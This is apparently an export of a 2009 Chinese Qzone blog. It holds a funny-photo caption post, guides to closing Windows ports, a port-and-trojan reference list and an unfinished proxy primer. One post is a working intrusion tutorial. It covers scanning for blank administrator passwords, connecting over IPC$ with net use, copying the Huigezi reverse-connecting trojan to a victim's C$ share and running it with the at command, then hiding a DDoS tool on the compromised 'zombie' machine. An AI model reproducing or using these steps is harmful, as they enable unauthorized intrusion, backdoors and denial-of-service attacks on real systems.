http://78040007.qzone.qq.com Fri, 27 Nov 2009 13:16:56 GMT Qzone zh-cn Copyright (C), 2005-2008, Tencent Tech. Co., Ltd. Sun, 09 Aug 2009 07:10:41 GMT http://78040007.qzone.qq.com/blog/1249801841 走模特..回眸一笑..然后...



史上最假假摔

小孩长大有体操天赋..

猫咪眼神不好...

这家伙...很帅..也很衰..

条件反射..

巴西VS阿根廷..哈哈..

最富有舞蹈色彩的裁判..

夺命剪刀腿..

貌似是舞林争霸的评选吧？？

阿森纳的前锋...这平衡能力也太臭了点吧

进球后的庆祝..还托马斯回旋呢..

快使用双节棍...哼哼哈嘿..

穿牛仔不能玩跑步机吧？？

这下一定疼死啦..

可不能在大街上跳街舞

你敢打？我就敢往POP传...

屠龙刀爆了...我靠..

打麻将输了不给钱？

飞了...

弹簧腿...我一扣..再扣...扣扣扣扣

斗鸡的下场

..这女孩 有前途.

唉呀妈呀.谁酒窖门没关



感觉这张好傻..

看你这观众老不顺眼了..顶你.

星球大战.哇靠..

小孩有前途..前轮制动玩漂移 哈哈

你有我灵敏么？拽你尾巴在拽腿..



群主来啦，快闪开 ]]> http://78040007.qzone.qq.com/blog/1249801841#comment 134218249 Sun, 09 Aug 2009 07:10:41 GMT http://78040007.qzone.qq.com/blog/1249801841 http://78040007.qzone.qq.com/blog/1248929186 每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要，关掉端口也就是关闭无用的服务。 “控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口：关闭Simple TCP/IP Service,支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、关闭80口：关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing Service"，通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口：关闭Simple Mail Transport Protocol (SMTP)服务，它提供的功能是跨网传送电子邮件。
4、关掉21端口：关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务，此服务提供 RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享，比如ipc$、c$、admin$等等，此服务关闭不影响您的共他操作。
7、还有一个就是139端口，139端口是NetBIOS　Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机，现在好了。 关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。 对于个人用户来说，可以在各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动，端口也开放了。 每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要，关掉端口也就是关闭无用的服务。
“控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口：关闭Simple TCP/IP Service,支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、关闭80口：关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing Service"，通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口：关闭Simple Mail Transport Protocol (SMTP)服务，它提供的功能是跨网传送电子邮件。
4、关掉21端口：关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务，此服务提供 RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享，比如ipc$、c$、admin$等等，此服务关闭不影响您的共他操作。
7、还有一个就是139端口，139端口是NetBIOS　Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机，现在好了。
关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。
对于个人用户来说，可以在各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动，端口也开放了。
　我们一般采用一些功能强大的反黑软件和防火墙来保证我们的系统安全，但是有些用户不具备上述条件。怎么办呢？下面就介绍一种简易的办法——通过限制端口来帮助大家防止非法入侵。
　　非法入侵的方式
　　简单说来，非法入侵的方式可粗略分为4种：
　　1、扫描端口，通过已知的系统Bug攻入主机。
　　2、种植木马，利用木马开辟的后门进入主机。
　　3、采用数据溢出的手段，迫使主机提供后门进入主机。
　　4、利用某些软件设计的漏洞，直接或间接控制主机。
　　非法入侵的主要方式是前两种，尤其是利用一些流行的黑客工具，通过第一种方式攻击主机的情况最多、也最普遍；而对后两种方式来说，只有一些手段高超的黑客才利用，波及面并不广泛，而且只要这两种问题一出现，软件服务商很快就会提供补丁，及时修复系统。
　　因此，如果能限制前两种非法入侵方式，就能有效防止利用黑客工具的非法入侵。而且前两种非法入侵方式有一个共同点，就是通过端口进入主机。
　　端口就像一所房子(服务器)的几个门一样，不同的门通向不同的房间(服务器提供的不同服务)。我们常用的FTP默认端口为21，而WWW网页一般默认端口是80。但是有些马虎的网络管理员常常打开一些容易被侵入的端口服务，比如139等；还有一些木马程序，比如冰河、BO、广外等都是自动开辟一个您不察觉的端口。那么，只要我们把自己用不到的端口全部封锁起来，不就杜绝了这两种非法入侵吗？
　　限制端口的方法
　　对于个人用户来说，您可以限制所有的端口，因为您根本不必让您的机器对外提供任何服务；而对于对外提供网络服务的服务器，我们需把必须利用的端口(比如WWW端口80、FTP端口21、邮件服务端口25、110等)开放，其他的端口则全部关闭。
　　这里，对于采用Windows 2000或者Windows XP的用户来说，不需要安装任何其他软件，可以利用“TCP/IP筛选”功能限制服务器的端口。具体设置如下：
　　1、右键点击“网上邻居”，选择“属性”，然后双击“本地连接”(如果是拨号上网用户，选择“我的连接”图标)，弹出“本地连接状态”对话框。
　　2、点击[属性]按钮，弹出“本地连接属性”，选择“此连接使用下列项目”中的“Internet协议(TCP/IP)”，然后点击[属性]按钮。
　　3、在弹出的“Internet协议(TCP/IP)”对话框中点击[高级]按钮。在弹出的“高级TCP/IP设置”中，选择“选项”标签，选中“TCP/IP筛选”，然后点击[属性]按钮。
　　4、在弹出的“TCP/IP筛选”对话框里选择“启用TCP/IP筛选”的复选框，然后把左边“TCP端口”上的“只允许”选上(请见附图)。
　　这样，您就可以来自己添加或删除您的TCP或UDP或IP的各种端口了。
　　添加或者删除完毕，重新启动机器以后，您的服务器就被保护起来了。
　　如果只上网浏览的话，可以不添加任何端口。但是要利用一些网络联络工具，比如OICQ的话，就要把“4000”这个端口打开，同理，如果发现某个常用的网络工具不能起作用的时候，请搞清它在您主机所开的端口，然后在“TCP/IP筛选”中添加端口即可。 ]]> http://78040007.qzone.qq.com/blog/1248929186#comment 134218240 Thu, 30 Jul 2009 04:46:26 GMT http://78040007.qzone.qq.com/blog/1248929186 http://78040007.qzone.qq.com/blog/1248929168 服务：Reserved
说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。 端口：1
服务：tcpmux
说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口：7
服务：Echo
说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。 端口：19
服务：Character Generator
说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。 端口：21
服务：FTP
说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。 端口：22
服务：Ssh
说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。 端口：23
服务：Telnet
说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。 端口：25
服务：SMTP
说明：SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭，他们需要连接到高带宽的E-MAIL服务器上，将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。 端口：31
服务：MSG Authentication
说明：木马Master Paradise、Hackers Paradise开放此端口。 端口：42
服务：WINS Replication
说明：WINS复制 端口：53
服务：Domain Name Server（DNS）
说明：DNS服务器所开放的端口，入侵者可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其他的通信。因此防火墙常常过滤或记录此端口。 端口：67
服务：Bootstrap Protocol Server
说明：通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们，分配一个地址把自己作为局部路由器而发起大量中间人（man-in-middle）攻击。客户端向68端口广播请求配置，服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。 端口：69
服务：Trival File Transfer
说明：许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。 端口：79
服务：Finger Server
说明：入侵者用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描。 端口：80
服务：HTTP
说明：用于网页浏览。木马Executor开放此端口。 端口：99
服务：Metagram Relay
说明：后门程序ncx99开放此端口。 端口：102
服务：Message transfer agent(MTA)-X.400 over TCP/IP
说明：消息传输代理。 端口：109
服务：Post Office Protocol -Version3
说明：POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个，这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。 端口：110
服务：SUN公司的RPC服务所有端口
说明：常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等 端口：113
服务：Authentication Service
说明：这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。 端口：119
服务：Network News Transfer Protocol
说明：NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。 端口：135
服务：Location Service
说明：Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗？什么版本？还有些DOS攻击直接针对这个端口。 端口：137、138、139
服务：NETBIOS Name Service
说明：其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139端口：通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。 端口：143
服务：Interim Mail Access Protocol v2
说明：和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。 端口：161
服务：SNMP
说明：SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。 端口：177
服务：X Display Manager Control Protocol
说明：许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。 端口：389
服务：LDAP、ILS
说明：轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。 端口：443
服务：Https
说明：网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。 端口：456
服务：[NULL]
说明：木马HACKERS PARADISE开放此端口。 端口：513
服务：Login,remote login
说明：是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。 端口：544
服务：[NULL]
说明：kerberos kshell 端口：548
服务：Macintosh,File Services(AFP/IP)
说明：Macintosh,文件服务。 端口：553
服务：CORBA IIOP （UDP）
说明：使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。 端口：555
服务：DSF
说明：木马PhAse1.0、Stealth Spy、IniKiller开放此端口。 端口：568
服务：Membership DPA
说明：成员资格 DPA。 端口：569
服务：Membership MSN
说明：成员资格 MSN。 端口：635
服务：mountd
说明：Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。 端口：636
服务：LDAP
说明：SSL（Secure Sockets layer） 端口：666
服务：Doom Id Software
说明：木马Attack FTP、Satanz Backdoor开放此端口 端口：993
服务：IMAP
说明：SSL（Secure Sockets layer） 端口：1001、1011
服务：[NULL]
说明：木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。 端口：1024
服务：Reserved
说明：它是动态端口的开始，许多程序并不在乎用哪个端口连接网络，它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器，打开Telnet，再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。 端口：1025、1033
服务：1025：network blackjack 1033：[NULL]
说明：木马netspy开放这2个端口。 端口：1080
服务：SOCKS
说明：这一协议以通道方式穿过防火墙，允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置，它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误，在加入IRC聊天室时常会看到这种情况。 端口：1170
服务：[NULL]
说明：木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。 端口：1234、1243、6711、6776
服务：[NULL]
说明：木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。 端口：1245
服务：[NULL]
说明：木马Vodoo开放此端口。 端口：1433
服务：SQL
说明：Microsoft的SQL服务开放的端口。 端口：1492
服务：stone-design-1
说明：木马FTP99CMP开放此端口。 端口：1500
服务：RPC client fixed port session queries
说明：RPC客户固定端口会话查询 端口：1503
服务：NetMeeting T.120
说明：NetMeeting T.120 端口：1524
服务：ingress
说明：许多攻击脚本将安装一个后门SHELL于这个端口，尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图，很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口，看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。 端口：1600
服务：issd
说明：木马Shivka-Burka开放此端口。 端口：1720
服务：NetMeeting
说明：NetMeeting H.233 call Setup。 端口：1731
服务：NetMeeting Audio Call Control
说明：NetMeeting音频调用控制。 端口：1807
服务：[NULL]
说明：木马SpySender开放此端口。 端口：1981
服务：[NULL]
说明：木马ShockRave开放此端口。 端口：1999
服务：cisco identification port
说明：木马BackDoor开放此端口。 端口：2000
服务：[NULL]
说明：木马GirlFriend 1.3、Millenium 1.0开放此端口。 端口：2001
服务：[NULL]
说明：木马Millenium 1.0、Trojan Cow开放此端口。 端口：2023
服务：xinuexpansion 4
说明：木马Pass Ripper开放此端口。 端口：2049
服务：NFS
说明：NFS程序常运行于这个端口。通常需要访问Portmapper查询这个服务运行于哪个端口。 端口：2115
服务：[NULL]
说明：木马Bugs开放此端口。 端口：2140、3150
服务：[NULL]
说明：木马Deep Throat 1.0/3.0开放此端口。 端口：2500
服务：RPC client using a fixed port session replication
说明：应用固定端口会话复制的RPC客户 端口：2583
服务：[NULL]
说明：木马Wincrash 2.0开放此端口。 端口：2801
服务：[NULL]
说明：木马Phineas Phucker开放此端口。 端口：3024、4092
服务：[NULL]
说明：木马WinCrash开放此端口。 端口：3128
服务：squid
说明：这是squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。也会看到搜索其他代理服务器的端口8000、8001、8080、8888。扫描这个端口的另一个原因是用户正在进入聊天室。其他用户也会检验这个端口以确定用户的机器是否支持代理。 端口：3129
服务：[NULL]
说明：木马Master Paradise开放此端口。 端口：3150
服务：[NULL]
说明：木马The Invasor开放此端口。 端口：3210、4321
服务：[NULL]
说明：木马SchoolBus开放此端口 端口：3333
服务：dec-notes
说明：木马Prosiak开放此端口 端口：3389
服务：超级终端
说明：WINDOWS 2000终端开放此端口。 端口：3700
服务：[NULL]
说明：木马Portal of Doom开放此端口 端口：3996、4060
服务：[NULL]
说明：木马RemoteAnything开放此端口 端口：4000
服务：QQ客户端
说明：腾讯QQ客户端开放此端口。 端口：4092
服务：[NULL]
说明：木马WinCrash开放此端口。 端口：4590
服务：[NULL]
说明：木马ICQTrojan开放此端口。 端口：5000、5001、5321、50505
服务：[NULL]
说明：木马blazer5开放5000端口。木马Sockets de Troie开放5000、5001、5321、50505端口。 端口：5400、5401、5402
服务：[NULL]
说明：木马Blade Runner开放此端口。 端口：5550
服务：[NULL]
说明：木马xtcp开放此端口。 端口：5569
服务：[NULL]
说明：木马Robo-Hack开放此端口。 端口：5632
服务：pcAnywere
说明：有时会看到很多这个端口的扫描，这依赖于用户所在的位置。当用户打开pcAnywere时，它会自动扫描局域网C类网以寻找可能的代理（这里的代理是指agent而不是proxy）。入侵者也会寻找开放这种服务的计算机。，所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描包常含端口22的UDP数据包。 端口：5742
服务：[NULL]
说明：木马WinCrash1.03开放此端口。 端口：6267
服务：[NULL]
说明：木马广外女生开放此端口。 端口：6400
服务：[NULL]
说明：木马The tHing开放此端口。 端口：6670、6671
服务：[NULL]
说明：木马Deep Throat开放6670端口。而Deep Throat 3.0开放6671端口。 端口：6883
服务：[NULL]
说明：木马DeltaSource开放此端口。 端口：6969
服务：[NULL]
说明：木马Gatecrasher、Priority开放此端口。 端口：6970
服务：RealAudio
说明：RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。 端口：7000
服务：[NULL]
说明：木马Remote Grab开放此端口。 端口：7300、7301、7306、7307、7308
服务：[NULL]
说明：木马NetMonitor开放此端口。另外NetSpy1.0也开放7306端口。 端口：7323
服务：[NULL]
说明：Sygate服务器端。 端口：7626
服务：[NULL]
说明：木马Giscier开放此端口。 端口：7789
服务：[NULL]
说明：木马ICKiller开放此端口。 端口：8000
服务：OICQ
说明：腾讯QQ服务器端开放此端口。 端口：8010
服务：Wingate
说明：Wingate代理开放此端口。 端口：8080
服务：代理端口
说明：WWW代理开放此端口。 端口：9400、9401、9402
服务：[NULL]
说明：木马Incommand 1.0开放此端口。 端口：9872、9873、9874、9875、10067、10167
服务：[NULL]
说明：木马Portal of Doom开放此端口。 端口：9989
服务：[NULL]
说明：木马iNi-Killer开放此端口。 端口：11000
服务：[NULL]
说明：木马SennaSpy开放此端口。 端口：11223
服务：[NULL]
说明：木马Progenic trojan开放此端口。 端口：12076、61466
服务：[NULL]
说明：木马Telecommando开放此端口。 端口：12223
服务：[NULL]
说明：木马Hack＇99 KeyLogger开放此端口。 端口：12345、12346
服务：[NULL]
说明：木马NetBus1.60/1.70、GabanBus开放此端口。 端口：12361
服务：[NULL]
说明：木马Whack-a-mole开放此端口。 端口：13223
服务：PowWow
说明：PowWow是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有攻击性。它会驻扎在这个TCP端口等回应。造成类似心跳间隔的连接请求。如果一个拨号用户从另一个聊天者手中继承了IP地址就会发生好象有很多不同的人在测试这个端口的情况。这一协议使用OPNG作为其连接请求的前4个字节。 端口：16969
服务：[NULL]
说明：木马Priority开放此端口。 端口：17027
服务：Conducent
说明：这是一个外向连接。这是由于公司内部有人安装了带有Conducent"adbot"的共享软件。Conducent"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。 端口：19191
服务：[NULL]
说明：木马蓝色火焰开放此端口。 端口：20000、20001
服务：[NULL]
说明：木马Millennium开放此端口。 端口：20034
服务：[NULL]
说明：木马NetBus Pro开放此端口。 端口：21554
服务：[NULL]
说明：木马GirlFriend开放此端口。 端口：22222
服务：[NULL]
说明：木马Prosiak开放此端口。 端口：23456
服务：[NULL]
说明：木马Evil FTP、Ugly FTP开放此端口。 端口：26274、47262
服务：[NULL]
说明：木马Delta开放此端口。 端口：27374
服务：[NULL]
说明：木马Subseven 2.1开放此端口。 端口：30100
服务：[NULL]
说明：木马NetSphere开放此端口。 端口：30303
服务：[NULL]
说明：木马Socket23开放此端口。 端口：30999
服务：[NULL]
说明：木马Kuang开放此端口。 端口：31337、31338
服务：[NULL]
说明：木马BO(Back Orifice)开放此端口。另外木马DeepBO也开放31338端口。 端口：31339
服务：[NULL]
说明：木马NetSpy DK开放此端口。 端口：31666
服务：[NULL]
说明：木马BOWhack开放此端口。 端口：33333
服务：[NULL]
说明：木马Prosiak开放此端口。 端口：34324
服务：[NULL]
说明：木马Tiny Telnet Server、BigGluck、TN开放此端口。 端口：40412
服务：[NULL]
说明：木马The Spy开放此端口。 端口：40421、40422、40423、40426、
服务：[NULL]
说明：木马Masters Paradise开放此端口。 端口：43210、54321
服务：[NULL]
说明：木马SchoolBus 1.0/2.0开放此端口。 端口：44445
服务：[NULL]
说明：木马Happypig开放此端口。 端口：50766
服务：[NULL]
说明：木马Fore开放此端口。 端口：53001
服务：[NULL]
说明：木马Remote Windows Shutdown开放此端口。 端口：65000
服务：[NULL]
说明：木马Devil 1.03开放此端口。 端口：88
说明：Kerberos krb5。另外TCP的88端口也是这个用途。 端口：137
说明：SQL Named Pipes encryption over other protocols name lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins Proxy都用这个端口。 端口：161
说明：Simple Network Management Protocol(SMTP)（简单网络管理协议）。 端口：162
说明：SNMP Trap（SNMP陷阱） 端口：445
说明：Common Internet File System(CIFS)（公共Internet文件系统） 端口：464
说明：Kerberos kpasswd(v5)。另外TCP的464端口也是这个用途。 端口：500
说明：Internet Key Exchange(IKE)（Internet密钥交换） 端口：1645、1812
说明：Remot Authentication Dial-In User Service(RADIUS)authentication(Routing and Remote Access)(远程认证拨号用户服务) 端口：1646、1813
说明：RADIUS accounting(Routing and Remote Access)(RADIUS记帐（路由和远程访问）) 端口：1701
说明：Layer Two Tunneling Protocol(L2TP)(第2层隧道协议) 端口：1801、3527
说明：Microsoft Message Queue Server(Microsoft消息队列服务器)。还有TCP的135、1801、2101、2103、2105也是同样的用途。 端口：2504
说明：Network Load Balancing(网络平衡负荷) ]]> http://78040007.qzone.qq.com/blog/1248929168#comment 134218240 Thu, 30 Jul 2009 04:46:08 GMT http://78040007.qzone.qq.com/blog/1248929168 http://78040007.qzone.qq.com/blog/1248929109
一、扫描
扫描软件在网络上很多，功能也各一，在这里我推荐大家用X-scan2.0，下载地http://www.ttian.net/download/show.php?id=473
下载解压后，运行x-scan-gui，在“扫描模块”里只选“NT-server弱口令“和“SQL-server弱口令”这两项；在“扫描参数”里“基本设置”选项设置你要扫描的IP地址；在“端口相关设置”里“待检测端口”输入你要扫描的端口，在这里可以只扫描1433和3389这两个端口，其它的不变。一切准备好后就开始扫描，要不了多久就会出现结果。
二、入侵
在这里我们要用到一个木马，我推荐大家用“灰鸽子”，它是一个反弹性木马，具有自动上线连接的功能，当中木马机器的IP地址变了时也会自动上线连接。
下载地http://www.ttian.net/download/show.php?id=446。
下载解压后有p-client.exe（在自己的机器上运行的客户端程序）和server.exe（在肉鸡上运行的程序）。我们要让对方运行server.exe程序（记住这个程序不要在自己的机器上运行哟）。在让对方运行server.exe程序之前先配置server.exe程序（注意如果不配置这个程序即使对方运行了我们上传上去的server.exe程序，我们也不能和他连接）。具体配置server的方http://www.ttian.net/article/show.php?id=357
比如我们刚才扫描到一台IP为61.216.216.216的主机，Administrator密码为空。我们要利用刚才扫描得到的NT弱口令，再用IPC$管道来连接。具体如下：
1、先和对方主机建立连接，操作如下：
net use \\61.216.216.216\ipc$ "" /user:"administrator"
2、拷贝木马程序到对方的机器的C盘下，操作如下：
copy server.exe \\61.216.216.216\c$
3、查看对方时间，操作如下：
net time \\61.216.216.216
4、假设对方的时间为下午1:23，让对方机器在13：25运行木马程序，操作如下：
at \\61.216.216.216 13:25 c:\server.exe（注意对方的时间为12小时制，我们用AT命令时要转换为24小时制，让对方运行木马的时间最好比对方机器的当前时间多几分钟）
5、查看木马程序是否运行，操作如下：
at \\61.216.216.216
如果清单为空，说明木马已运行了，这时我们可以在自己的机器上运行p-client.exe，刚才中了木马的机器就会自动来连接。
三、攻击
我写这篇文章的主要目的就是它。我们在这里要用到的一个攻击软件叫“独裁者”，它是一个采用的是分布式拒绝服务攻击的软件，下载下地http://www.leothreads.com/usr/25/25_18196.zip
“独裁者”的使用教程：
http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=17639&show=0
我们要让肉鸡运行“独裁者”的server.exe程序。
在木马“灰鸽子”里进入IP为61.216.216.216的主机的C盘，点右键“文件上传自”找到“独裁者”的server.exe点打开既可。当程序上传完后点刷新就可以看到我们刚才上传的server.exe文件了。右键点server.exe选“远程打开”“隐藏运行”，过一会我们就可以在
“独裁者”里加61.216.216.216这个ＩＰ了。
也许有人要问：“就是为什么我们要让对方对行木马，我们不可以直接在ＤＯＳ下上传“独裁者”的server.exe文件并上它运行就行了吗？
在这里我要说的就是“独裁者”没有自动连接的功能，如果肉鸡不是固定的ＩＰ，哪肉鸡就只能用一次，因为肉鸡原来哪个ＩＰ变了呀！这里的木马就有自动上线连接ＩＰ的功能，即使肉鸡的ＩＰ变了也能和连接。这样肉鸡就飞不了啦！嘿嘿！
其实这个的木马还有很多功能，比如可以用来作代理、查看对方屏幕、记录密码等，这就要你自己去慢慢探索吧。
]]> http://78040007.qzone.qq.com/blog/1248929109#comment 134218240 Thu, 30 Jul 2009 04:45:09 GMT http://78040007.qzone.qq.com/blog/1248929109 http://78040007.qzone.qq.com/blog/1248929065 第一步 什么是代理服务器
　　随着计算机知识的逐步普及以及ＩＮＴＥＲＮＥＴ网络的迅速发展，学习网络和使用网络不再是那些有钱和有技术的人的专利，ＩＮＴＥＲＮＥＴ网络已作为一种生活方式走进了寻常百姓家。越来越多的公司也纷纷将自己的公司局域网接入了ＩＮＴＥＲＮＥＴ。当然接入因特网的方式是多样的。通常，对于个人用户来说，只要购买一个调制解调器通过一根电话线就能连上因特网了。公司由于计算机数量多，通信需求量大，一般都采用专线接入方式。然而专线费用太昂贵了，那么有没有办法利用一条电话线就可以使多台计算机同时上网呢？
　　在这种情况下，代理服务器便应运而生了。那什么是代理服务器，它是如何工作的，它有什么作用以及如何设置和使用代理服务器就成了人们很关心的话题。籍于此，笔者就把自己知道的有关代理服务器的知识写下来，希望能给那些想迫切了解这方面知识的用户或网友带去一点点帮助！ 　　
　　代理服务器的基本概念
　　代理服务器(Proxy Server)就是个人网络和因特网服务商之间的中间代理机构，它负责转发合法的网络信息，并对转发进行控制和登记。
　　在使用网络浏览器浏览网络信息的时候，如果使用代理服务器，浏览器就不是直接到Web服务器去取回网页，而是向代理服务器发出请求，由代理服务器取回浏览器所需要的信息。
　　目前使用的因特网是一个典型的客户机／服务器结构，当用户的本地机与因特网连接时，通过本地机的客户程序比如浏览器或者软件下载工具发出请求，远端的服务器在接到请求之后响应请求并提供相应的服务。
　　那么代理服务器起什么作用呢？
